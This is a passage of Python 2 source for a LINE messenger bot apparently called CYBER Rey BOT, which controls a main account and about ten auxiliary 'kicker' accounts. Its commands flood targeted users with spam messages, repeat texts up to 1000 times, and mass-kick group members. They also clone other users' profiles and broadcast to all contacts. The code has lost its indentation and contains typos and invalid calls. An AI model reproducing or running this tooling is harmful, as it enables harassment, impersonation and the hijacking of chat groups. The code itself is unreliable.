ki5.sendText(g.mid,"Your Account Has Been Spammed !")
ki6.sendText(g.mid,"Your Account Has Been Spammed !")
ki7.sendText(g.mid,"Your Account Has Been Spammed !")
ki.sendText(g.mid,"Your Account Has Been Spammed !")
ki2.sendText(g.mid,"Your Account Has Been Spammed !")
ki3.sendText(g.mid,"Your Account Has Been Spammed !")
ki4.sendText(g.mid,"Your Account Has Been Spammed !")
ki5.sendText(g.mid,"Your Account Has Been Spammed !")
ki6.sendText(g.mid,"Your Account Has Been Spammed !")
ki7.sendText(g.mid,"Your Account Has Been Spammed !")
ki.sendText(g.mid,"Your Account Has Been Spammed !")
ki2.sendText(g.mid,"Your Account Has Been Spammed !")
ki3.sendText(g.mid,"Your Account Has Been Spammed !")
ki4.sendText(g.mid,"Your Account Has Been Spammed !")
ki5.sendText(g.mid,"Your Account Has Been Spammed !")
ki6.sendText(g.mid,"Your Account Has Been Spammed !")
ki7.sendText(g.mid,"Your Account Has Been Spammed !")
ki.sendText(g.mid,"Your Account Has Been Spammed !")
ki2.sendText(g.mid,"Your Account Has Been Spammed !")
ki3.sendText(g.mid,"Your Account Has Been Spammed !")
ki4.sendText(g.mid,"Your Account Has Been Spammed !")
ki5.sendText(g.mid,"Your Account Has Been Spammed !")
ki6.sendText(g.mid,"Your Account Has Been Spammed !")
ki7.sendText(g.mid,"Your Account Has Been Spammed !")
ki.sendText(g.mid,"Your Account Has Been Spammed !")
ki2.sendText(g.mid,"Your Account Has Been Spammed !")
ki3.sendText(g.mid,"Your Account Has Been Spammed !")
ki4.sendText(g.mid,"Your Account Has Been Spammed !")
ki5.sendText(g.mid,"Your Account Has Been Spammed !")
ki6.sendText(g.mid,"Your Account Has Been Spammed !")
ki7.sendText(g.mid,"Your Account Has Been Spammed !")
ki.sendText(g.mid,"Your Account Has Been Spammed !")
ki2.sendText(g.mid,"Your Account Has Been Spammed !")
ki3.sendText(g.mid,"Your Account Has Been Spammed !")
ki4.sendText(g.mid,"Your Account Has Been Spammed !")
ki5.sendText(g.mid,"Your Account Has Been Spammed !")
ki6.sendText(g.mid,"Your Account Has Been Spammed !")
ki7.sendText(g.mid,"Your Account Has Been Spammed !")
ki.sendText(g.mid,"Your Account Has Been Spammed !")
ki2.sendText(g.mid,"Your Account Has Been Spammed !")
ki3.sendText(g.mid,"Your Account Has Been Spammed !")
ki4.sendText(g.mid,"Your Account Has Been Spammed !")
ki5.sendText(g.mid,"Your Account Has Been Spammed !")
ki6.sendText(g.mid,"Your Account Has Been Spammed !")
ki7.sendText(g.mid,"Your Account Has Been Spammed !")
ki.sendText(g.mid,"Your Account Has Been Spammed !")
ki2.sendText(g.mid,"Your Account Has Been Spammed !")
ki3.sendText(g.mid,"Your Account Has Been Spammed !")
ki4.sendText(g.mid,"Your Account Has Been Spammed !")
ki5.sendText(g.mid,"Your Account Has Been Spammed !")
ki6.sendText(g.mid,"Your Account Has Been Spammed !")
ki7.sendText(g.mid,"Your Account Has Been Spammed !")
ki.sendText(msg.to, "Done")
ki2.sendText(msg.to, "Done")
ki3.sendText(msg.to, "Done")
ki4.sendText(msg.to, "Done")
ki5.sendText(msg.to, "Done")
ki6.sendText(msg.to, "Done")
ki7.sendText(msg.to, "Done")
print " Spammed !"
elif "Hallo " in msg.text:
midd = msg.text.replace("Hallo ","")
gs = cl.getGroup(msg.to)
for g in gs.members:
if _nametarget == g.displayName:
ki.sendText(g.mid,[miid] + "Your Account Has Been Spammed !")
ki2.sendText(g.mid,[midd] + "Your Account Has Been Spammed !")
ki3.sendText(g.mid,[midd] + "Your Account Has Been Spammed !")
ki4.sendText(g.mid,[midd] + "Your Account Has Been Spammed !")
ki5.sendText(g.mid,[midd] + "Your Account Has Been Spammed !")
ki6.sendText(g.mid,[midd] + "Your Account Has Been Spammed !")
ki7.sendText(g.mid,[midd] + "Your Account Has Been Spammed !")
ki.sendText(msg.to, "Done")
ki2.sendText(msg.to, "Done")
ki3.sendText(msg.to, "Done")
ki4.sendText(msg.to, "Done")
ki5.sendText(msg.to, "Done")
ki6.sendText(msg.to, "Done")
ki7.sendText(msg.to, "Done")
print " Spammed !"
#-----------------------------------------------------------)
elif ("Ban " in msg.text):
if msg.from_ in admin:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
wait["blacklist"][target] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
cl.sendText(msg.to,"Succes Bosque")
except:
pass
elif "Unban @" in msg.text:
if msg.toType == 2:
print "[Unban]ok"
_name = msg.text.replace("Unban @","")
_nametarget = _name.rstrip()
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Not found")
else:
for target in targets:
try:
del wait["blacklist"][target]
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
cl.sendText(msg.to,"Target Unlocked")
except:
cl.sendText(msg.to,"Error")
elif "Ban:" in msg.text:
nk0 = msg.text.replace("Ban:","")
nk1 = nk0.lstrip()
nk2 = nk1.replace("","")
nk3 = nk2.rstrip()
_name = nk3
gs = cl.getGroup(msg.to)
targets = []
for s in gs.members:
if _name in s.displayName:
targets.append(s.mid)
if targets == []:
sendMessage(msg.to,"user does not exist")
pass
else:
for target in targets:
try:
wait["blacklist"][target] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
cl.sendText(msg.to,"Target Locked")
except:
kk.sendText(msg.to,"Error")
elif "Unban:" in msg.text:
nk0 = msg.text.replace("Unban:","")
nk1 = nk0.lstrip()
nk2 = nk1.replace("","")
nk3 = nk2.rstrip()
_name = nk3
gs = cl.getGroup(msg.to)
targets = []
for s in gs.members:
if _name in s.displayName:
targets.append(s.mid)
if targets == []:
sendMessage(msg.to,"user does not exist")
pass
else:
for target in targets:
try:
del wait["blacklist"][target]
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
cl.sendText(msg.to,"Target Unlocked")
except:
kk.sendText(msg.to,"Error")
#-----------------------------------------------------------
elif "Mycopy @" in msg.text:
if msg.toType == 2:
if msg.from_ in admin:
print "[COPY] Ok"
_name = msg.text.replace("Mycopy @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to, "Not Found...")
else:
for target in targets:
try:
cl.cloneContactProfile(target)
cl.sendText(msg.to, "Succes Copy profile")
except Exception as e:
print e
elif msg.text in ["Mybackup"]:
try:
cl.updateDisplayPicture(mybackup.pictureStatus)
cl.updateProfile(mybackup)
cl.sendText(msg.to, "backup done")
except Exception as e:
cl.sendText(msg.to, str (e))
elif msg.text in ["Bot restart","Reboot"]:
if msg.from_ in admsa:
cl.sendText(msg.to, "Bot Has Been Restarted...")
restart_program()
print "@Restart"
else:
ki.sendText(msg.to, "No Access")
elif msg.text in ["Sticker on"]:
wait["sticker"] = True
cl.sendText(msg.to,"Sticker ID Detect Already On.")
elif msg.text in ["Sticker off"]:
wait["sticker"] = False
cl.sendText(msg.to,"Sticker ID Detect Already Off.")
elif msg.text in ["Backup"]:
try:
ki.updateDisplayPicture(backup1.pictureStatus)
ki.updateProfile(backup1)
ki2.updateDisplayPicture(backup2.pictureStatus)
ki2.updateProfile(backup2)
ki3.updateDisplayPicture(backup3.pictureStatus)
ki3.updateProfile(backup3)
ki4.updateDisplayPicture(backup4.pictureStatus)
ki4.updateProfile(backup4)
ki5.updateDisplayPicture(backup5.pictureStatus)
ki5.updateProfile(backup5)
ki6.updateDisplayPicture(backup6.pictureStatus)
ki6.updateProfile(backup6)
ki7.updateDisplayPicture(backup7.pictureStatus)
ki7.updateProfile(backup7)
ki8.updateDisplayPicture(backup8.pictureStatus)
ki8.updateProfile(backup8)
ki9.updateDisplayPicture(backup9.pictureStatus)
ki9.updateProfile(backup9)
ki10.updateDisplayPicture(backup10.pictureStatus)
ki10.updateProfile(backup10)
cl.sendText(msg.to, "backup done")
except Exception as e:
cl.sendText(msg.to, str (e))
#-----------------------------------------------------------
elif "Mban:" in msg.text:
midd = msg.text.replace("Mban:","")
wait["blacklist"][midd] = True
cl.sendText(msg.to,"Target Lock")
#-----------------------------------------------------<------
elif "#leave" in msg.text:
try:
import sys
sys.exit()
except:
pass
#-----------------------------------------------------------
elif msg.text in ["Sp","Speed","speed"]:
start = time.time()
cl.sendText(msg.to, "Progress...")
elapsed_time = time.time() - start
cl.sendText(msg.to, "%sseconds" % (elapsed_time))
ki.sendText(msg.to, "%sseconds" % (elapsed_time))
ki2.sendText(msg.to, "%sseconds" % (elapsed_time))
ki3.sendText(msg.to, "%sseconds" % (elapsed_time))
ki4.sendText(msg.to, "%sseconds" % (elapsed_time))
ki5.sendText(msg.to, "%sseconds" % (elapsed_time))
ki6.sendText(msg.to, "%sseconds" % (elapsed_time))
ki7.sendText(msg.to, "%sseconds" % (elapsed_time))
ki8.sendText(msg.to, "%sseconds" % (elapsed_time))
ki9.sendText(msg.to, "%sseconds" % (elapsed_time))
ki10.sendText(msg.to, "%sseconds" % (elapsed_time))
#-----------------------------------------------------------
elif msg.text.lower() == 'respons':
profile = ki.getProfile()
text = profile.displayName + ""
cl.sendText(msg.to, text)
profile = ki2.getProfile()
text = profile.displayName + ""
ki.sendText(msg.to, text)
profile = ki3.getProfile()
text = profile.displayName + ""
#-------------------------------------------------------------------
#------------------------------------------------------------------
elif "Getcover @" in msg.text:
print "[Command]dp executing"
_name = msg.text.replace("Getcover @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
ki.sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
contact = cl.getContact(target)
cu = cl.channel.getCover(target)
path = str(cu)
cl.sendImageWithURL(msg.to, path)
except:
pass
print "[Command]dp executed"
#------------------------------------------------------------------
elif "Getpict @" in msg.text:
print "[Command]dp executing"
_name = msg.text.replace("Getpict @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
ki.sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
contact = cl.getContact(target)
path = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
cl.sendImageWithURL(msg.to, path)
except:
pass
print "[Command]dp executed"
#------------------------------------------------------------------
elif msg.text in ["Gcreator:inv"]:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
gCreator = ginfo.creator.mid
try:
cl.findAndAddContactsByMid(gCreator)
cl.inviteIntoGroup(msg.to,[gCreator])
print "success inv gCreator"
except:
pass
elif "Mid @" in msg.text:
_name = msg.text.replace("Mid @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
for g in gs.members:
if _nametarget == g.displayName:
cl.sendText(msg.to, g.mid)
else:
pass
elif msg.text in ["Bans:on"]:
wait["wblacklist"] = True
cl.sendText(msg.to,"Send Contact")
elif msg.text in ["Unbans:on"]:
wait["dblacklist"] = True
cl.sendText(msg.to,"Send Contact")
elif msg.text.lower() == 'mcheck':
if wait["blacklist"] == {}:
cl.sendText(msg.to," Nothing in the blacklist")
else:
cl.sendText(msg.to," following is a blacklist")
mc = ""
for mi_d in wait["blacklist"]:
mc += "➡" +cl.getContact(mi_d).displayName + "\n"
cl.sendText(msg.to,mc)
elif msg.text.lower() == 'banlist':
if msg.toType == 2:
group = cl.getGroup(msg.to)
gMembMids = [contact.mid for contact in group.members]
matched_list = []
for tag in wait["blacklist"]:
matched_list+=filter(lambda str: str == tag, gMembMids)
cocoa = ""
for mm in matched_list:
cocoa += "➡" +cl.getContact(mm).displayName + "\n"
cl.sendText(msg.to,cocoa + "Daftar Hitam")
elif msg.text.lower() == 'kill':
if msg.toType == 2:
group = ki.getGroup(msg.to)
gMembMids = [contact.mid for contact in group.members]
matched_list = []
for tag in wait["blacklist"]:
matched_list+=filter(lambda str: str == tag, gMembMids)
if matched_list == []:
ki.sendText(msg.to,"Daftar hitam pengguna tidak ada")
return
for jj in matched_list:
try:
ki.kickoutFromGroup(msg.to,[jj])
ki2.kickoutFromGroup(msg.to,[jj])
ki3.kickoutFromGroup(msg.to,[jj])
ki4.kickoutFromGroup(msg.to,[jj])
ki5.kickoutFromGroup(msg.to,[jj])
ki6.kickoutFromGroup(msg.to,[jj])
print (msg.to,[jj])
except:
pass
elif "1997" in msg.text:
if msg.from_ in admin:
if msg.toType == 2:
print "ok"
_name = msg.text.replace("1997","")
gs = ki.getGroup(msg.to)
gs = ki2.getGroup(msg.to)
ki.sendText(msg.to,"Test anu")
ki2.sendText(msg.to,"Misi-Misi")
targets = []
for g in gs.members:
if _name in g.displayName:
targets.append(g.mid)
if targets == []:
ki.sendText(msg.to,"Tidak ditemukan")
else:
for target in targets:
if not target in Bots:
try:
klist=[ki,ki2,ki3,ki4,ki5,ki6,ki7,ki8,ki9,ki10]
kicker=random.choice(klist)
kicker.kickoutFromGroup(msg.to,[target])
print (msg.to,[g.mid])
except:
ki.sendText(msg.to,"Mayhem done")
elif msg.text.lower() == 'cancel':
if msg.toType == 2:
group = cl.getGroup(msg.to)
gMembMids = [contact.mid for contact in group.invitee]
for _mid in gMembMids:
cl.cancelGroupInvitation(msg.to,[_mid])
cl.sendText(msg.to,"I pretended to cancel and canceled👈")
elif msg.text in ["Mangat","B"]:
if msg.toType == 2:
group = cl.getGroup(msg.to)
gMembMids = [contact.mid for contact in group.invitee]
for _mid in gMembMids:
cl.cancelGroupInvitation(msg.to,[_mid])
cl.sendText(msg.to,"B")
cl.sendText(msg.to,"B")
cl.sendText(msg.to,"B")
elif "Album" in msg.text:
try:
albumtags = msg.text.replace("Album","")
gid = albumtags[:33]
name = albumtags.replace(albumtags[:34],"")
cl.createAlbum(gid,name)
cl.sendText(msg.to,name + "We created an album👈")
except:
cl.sendText(msg.to,"Error")
elif "fakec→" in msg.text:
try:
source_str = 'abcdefghijklmnopqrstuvwxyz1234567890@:;./_][!&%$#)(=~^|'
name = "".join([random.choice(source_str) for x in xrange(10)])
amid = msg.text.replace("fakec→","")
cl.sendText(msg.to,str(cl.channel.createAlbumF(msg.to,name,amid)))
except Exception as e:
try:
cl.sendText(msg.to,str(e))
except:
pass
#-----------------------------------------------
#-----------------------------------------------
elif msg.text.lower() == ["reypro"]:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.0)
ki2.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.0)
ki3.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.0)
ki4.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.0)
ki5.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.0)
ki6.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.0)
ki7.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.0)
ki8.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.0)
ki9.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.0)
ki10.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.0)
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = True
random.choice(KAC).updateGroup(G)
print "kicker ok"
G.preventJoinByTicket(G)
random.choice(KAC).updateGroup(G)
#-----------------------------------------------
elif msg.text in ["ReyPro"]:
if msg.from_ in admin:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.0)
ki2.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.0)
ki3.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.0)
ki4.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.0)
ki5.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.0)
ki6.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.0)
ki7.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.0)
ki8.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.0)
ki9.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.0)
ki10.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.0)
G = cl.getGroup(msg.to)
G.preventJoinByTicket = True
ki2.updateGroup(G)
print "kicker ok"
G.preventJoinByTicket(G)
ki2.updateGroup(G)
elif msg.text.lower() == 'rey invitebot':
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki.acceptGroupInvitationByTicket(msg.to,Ticket)
ki2.acceptGroupInvitationByTicket(msg.to,Ticket)
ki3.acceptGroupInvitationByTicket(msg.to,Ticket)
ki4.acceptGroupInvitationByTicket(msg.to,Ticket)
ki5.acceptGroupInvitationByTicket(msg.to,Ticket)
ki6.acceptGroupInvitationByTicket(msg.to,Ticket)
ki7.acceptGroupInvitationByTicket(msg.to,Ticket)
ki8.acceptGroupInvitationByTicket(msg.to,Ticket)
ki9.acceptGroupInvitationByTicket(msg.to,Ticket)
ki10.acceptGroupInvitationByTicket(msg.to,Ticket)
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = True
ki.updateGroup(G)
print "kicker ok"
G.preventJoinByTicket(G)
ki.updateGroup(G)
elif msg.text.lower() in ["pap owner","pap ryan"]:
link = ["http://dl.profile.line-cdn.net/0hsaE-74FqLE54VACDRjRTGUQRIiMPeioGAGVrLlpcIisHM2gaRjFrfVUGIioANj4RQDM0Lw8EJi5c"]
pilih = random.choice(link)
ki.sendImageWithURL(msg.to,pilih)
elif msg.text.lower() in ["pap admin","pap raisa"]:
link = ["http://dl.profile.line-cdn.net/0hd00mj6gAOx8NFBfScO5ESDFRNXJ6Oj1XdXB8Ky9GYn0jcH1PNXtze38cYXhzJS8dZXJxLngdYSsn"]
pilih = random.choice(link)
ki2.sendImageWithURL(msg.to,pilih)
elif "Nspam: " in msg.text:
bctxt = msg.text.replace("Nspam: ", "")
t = 15
while(t):
ki.sendText(msg.to, (bctxt))
t-=1
elif "Spam: " in msg.text:
bctxt = msg.text.replace("Spam: ", "")
t = 50
while(t):
cl.sendText(msg.to, (bctxt))
t-=1
elif "Spam1: " in msg.text:
bctxt = msg.text.replace("Spam1: ", "")
t = 100
while(t):
ki.sendText(msg.to, (bctxt))
t-=1
elif "Spam2: " in msg.text:
bctxt = msg.text.replace("Spam2: ", "")
t = 200
while(t):
cl.sendText(msg.to, (bctxt))
t-=1
elif "Spam3: " in msg.text:
bctxt = msg.text.replace("Spam3: ", "")
t = 300
while(t):
ki2.sendText(msg.to, (bctxt))
t-=1
elif "Spam4: " in msg.text:
bctxt = msg.text.replace("Spam4: ", "")
t = 400
while(t):
ki3.sendText(msg.to, (bctxt))
t-=1
elif "Spam5: " in msg.text:
bctxt = msg.text.replace("Spam5: ", "")
t = 500
while(t):
cl.sendText(msg.to, (bctxt))
t-=1
elif "GhostSpam: " in msg.text:
bctxt = msg.text.replace("GhostSpam: ", "")
t = 1000
while(t):
ki5.sendText(msg.to, (bctxt))
t-=1
#-----------------------------------------------
elif "Rey1 in" in msg.text:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki.acceptGroupInvitationByTicket(msg.to,Ticket)
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = True
ki.updateGroup(G)
print "kicker ok"
G.preventJoinByTicket(G)
ki.updateGroup(G)
#-----------------------------------------------
elif "Rey2 in" in msg.text:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki2.acceptGroupInvitationByTicket(msg.to,Ticket)
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = True
ki2.updateGroup(G)
print "kicker ok"
G.preventJoinByTicket(G)
ki2.updateGroup(G)
#-----------------------------------------------
elif "Rey3 in" in msg.text:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki3.acceptGroupInvitationByTicket(msg.to,Ticket)
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = True
ki2.updateGroup(G)
print "kicker ok"
G.preventJoinByTicket(G)
ki2.updateGroup(G)
#-----------------------------------------------
elif "Rey4 in" in msg.text:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki4.acceptGroupInvitationByTicket(msg.to,Ticket)
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = True
ki3.updateGroup(G)
print "kicker ok"
G.preventJoinByTicket(G)
ki3.updateGroup(G)
#-----------------------------------------------
elif "Rey5 in" in msg.text:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki5.acceptGroupInvitationByTicket(msg.to,Ticket)
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = True
ki5.updateGroup(G)
print "kicker ok"
G.preventJoinByTicket(G)
ki5.updateGroup(G)
#-----------------------------------------------
elif "Rey6 in" in msg.text:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki6.acceptGroupInvitationByTicket(msg.to,Ticket)
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = True
ki6.updateGroup(G)
print "kicker ok"
G.preventJoinByTicket(G)
ki6.updateGroup(G)
#-----------------------------------------------
elif "Rey7 in" in msg.text:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki7.acceptGroupInvitationByTicket(msg.to,Ticket)
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = True
ki7.updateGroup(G)
print "kicker ok"
G.preventJoinByTicket(G)
ki7.updateGroup(G)
#-----------------------------------------------
elif msg.text in ["ReyOut"]:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
ki.sendText(msg.to,"Good bye " + str(ginfo.name) + "\nBot dipaksa keluar Oleh Owner")
ki.leaveGroup(msg.to)
ki2.leaveGroup(msg.to)
ki3.leaveGroup(msg.to)
ki4.leaveGroup(msg.to)
ki5.leaveGroup(msg.to)
ki6.leaveGroup(msg.to)
ki7.leaveGroup(msg.to)
ki8.leaveGroup(msg.to)
ki9.leaveGroup(msg.to)
ki10.leaveGroup(msg.to)
except:
pass
#-----------------------------------------------
elif "Rey1 bye" in msg.text:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
ki.leaveGroup(msg.to)
except:
pass
#-----------------------------------------------
elif "Rey2 bye" in msg.text:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
ki2.leaveGroup(msg.to)
except:
pass
#-----------------------------------------------
elif "Rey3 bye" in msg.text:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
ki3.leaveGroup(msg.to)
except:
pass
#-----------------------------------------------
elif "Rey4 bye" in msg.text:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
ki4.leaveGroup(msg.to)
except:
pass
#-----------------------------------------------
elif "Rey5 bye" in msg.text:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
ki5.leaveGroup(msg.to)
except:
pass
#-----------------------------------------------
elif "Rey6 bye" in msg.text:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
ki6.leaveGroup(msg.to)
except:
pass
#-----------------------------------------------
elif "Rey7 bye" in msg.text:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
ki7.leaveGroup(msg.to)
except:
pass
#-----------------------------------------------
elif "Rey8 bye" in msg.text:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
ki8.leaveGroup(msg.to)
except:
pass
#-----------------------------------------------
elif "Rey9 bye" in msg.text:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
ki9.leaveGroup(msg.to)
except:
pass
#-----------------------------------------------
elif "Rey10 bye" in msg.text:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
ki10.leaveGroup(msg.to)
except:
pass
#-----------------------------------------------
elif "Rey Key" in msg.text:
ki.sendText(msg.to,""" CYBER Rey BOT [Rey] \n\n key Only Kicker \n\n[Rey1 in]\n[1Aditname:]\n[B Cancel]\n??[kick @]\n[Ban @]\n[kill]\n[BotChat]\n[Respons]\n[Rey1 Gift]\n[Rey1 bye]\n\n
Re̶y̶Pr̶o̶ᵃˢⁱˢᵗ
""")
ki2.sendText(msg.to,""" CYBER Rey BOT [Rey] \n\n key Only Kicker \n\n[Rey1 in]\n[1Aditname:]\n[B Cancel]\n[kick @]\n[Ban @]\n[kill]\n[BotChat]\n[Respons]\n[Rey1 Gift]\n[Rey1 bye]\n\n
Re̶y̶Pr̶o̶ᵃˢⁱˢᵗ
""")
ki3.sendText(msg.to,""" CYBER Rey BOT [Rey] \n\n key Only Kicker \n\n[Rey1 in]\n[1Aditname:]\n[B Cancel]\n[kick @]\n[Ban @]\n[kill]\n[BotChat]\n[Respons]\n[Rey1 Gift]\n[Rey1 bye]\n\n
Re̶y̶Pr̶o̶ᵃˢⁱˢᵗ
""")
ki4.sendText(msg.to,""" CYBER Rey BOT [Rey] \n\n key Only Kicker \n\n[Rey1 in]\n??[1Aditname:]\n[B Cancel]\n[kick @]\n[Ban @]\n[kill]\n[BotChat]\n[Respons]\n[Rey1 Gift]\n??[Rey1 bye]\n\n
Re̶y̶Pr̶o̶ᵃˢⁱˢᵗ
""")
ki5.sendText(msg.to,""" ?? CYBER Rey BOT [Rey] \n\n key Only Kicker \n\n[Rey1 in]\n[1Aditname:]\n[B Cancel]\n[kick @]\n[Ban @]\n??[kill]\n[BotChat]\n??[Respons]\n[Rey1 Gift]\n??[Rey1 bye]\n\n
Re̶y̶Pr̶o̶ᵃˢⁱˢᵗ
""")
ki6.sendText(msg.to,""" CYBER Rey BOT [Rey] \n\n key Only Kicker \n\n[Rey1 in]\n[1Aditname:]\n[B Cancel]\n[kick @]\n[Ban @]\n[kill]\n[BotChat]\n[Respons]\n[Rey1 Gift]\n[Rey1 bye]\n\n
g
Re̶y̶Pr̶o̶ᵃˢⁱˢᵗ
""")
#-----------------------------------------------
elif msg.text in ["Welcome","wc","welcome","Wc"]:
ginfo = cl.getGroup(msg.to)
cl.sendText(msg.to,"Hosgeldiniz" + str(ginfo.name))
cl.sendText(msg.to,"Owner Grup " + str(ginfo.name) + " :\n" + ginfo.admin.displayName )
elif "Rey Say " in msg.text:
bctxt = msg.text.replace("Rey Say ","")
ki2.sendText(msg.to,(bctxt))
elif "BotBc: " in msg.text:
bc = msg.text.replace("BotBc: ","")
gid = ki.getGroupIdsJoined()
if msg.from_ in admsa:
for i in gid:
ki.sendText(i,"=======[BROADCAST]=======\n\n"+bc+"\n\nContact Me : line.me/ti/p/~s.k.9.7")
ki.sendText(msg.to,"Success BC BosQ")
else:
ki.sendText(msg.to,"Khusus Ryan")
elif "Scbc " in msg.text:
bctxt = msg.text.replace("Scbc ", "")
orang = cl.getAllContactIds()
t = 20
for manusia in orang:
while(t):
cl.sendText(manusia, (bctxt))
t-=1
elif "Cbc " in msg.text:
broadcasttxt = msg.text.replace("Cbc ", "")
orang = cl.getAllContactIds()
for manusia in orang:
cl.sendText(manusia, (broadcasttxt))
elif msg.text in ["Cancel"]:
gid = cl.getGroupIdsInvited()
for i in gid:
cl.rejectGroupInvitation(i)
cl.sendText(msg.to,"All invitations have been refused")
elif "say" in msg.text:
if msg.from_ in admin:
bctxt = msg.text.replace("Bc ","")
ki.sendText(msg.to,(bctxt))
ki2.sendText(msg.to,(bctxt))
ki3.sendText(msg.to,(bctxt))
ki4.sendText(msg.to,(bctxt))
ki5.sendText(msg.to,(bctxt))
ki6.sendText(msg.to,(bctxt))
ki7.sendText(msg.to,(bctxt))
k8.sendText(msg.to,(bctxt))
ki9.sendText(msg.to,(bctxt))
ki10.sendText(msg.to,(bctxt))
ki11.sendText(msg.to,(bctxt))
ki12.sendText(msg.to,(bctxt))
ki13.sendText(msg.to,(bctxt))
ki14.sendText(msg.to,(bctxt))
ki15.sendText(msg.to,(bctxt))
